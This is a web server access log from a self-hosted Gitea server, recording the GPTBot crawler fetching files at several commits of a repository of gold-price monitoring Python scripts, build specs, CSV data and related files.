"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12377] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 18018] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" -[17/Feb/2026:17:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21444] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20805] [Gzip 6.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11252] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12350] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12412] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17575] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" -[17/Feb/2026:17:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" -[17/Feb/2026:17:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17366] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20809] [Gzip 6.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12289] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 10805] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" -[17/Feb/2026:17:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 19911] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py?display=source" [Client 74.7.227.38] [Length 19879] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12386] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12376] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" -[17/Feb/2026:17:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" -[17/Feb/2026:17:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" -[17/Feb/2026:17:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12421] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec?display=source" [Client 74.7.227.38] [Length 12214] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12538] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:17:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" -[17/Feb/2026:17:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv?display=source" [Client 74.7.227.38] [Length 11410] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" -[17/Feb/2026:17:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 20858] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17365] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/my_database.db" -[17/Feb/2026:17:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 10819] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" -[17/Feb/2026:17:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" -[17/Feb/2026:17:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py?display=source" [Client 74.7.227.38] [Length 18090] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" -[17/Feb/2026:17:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" -[17/Feb/2026:17:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12373] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv?display=source" [Client 74.7.227.38] [Length 11381] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" -[17/Feb/2026:17:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12379] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12379] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20778] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12391] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 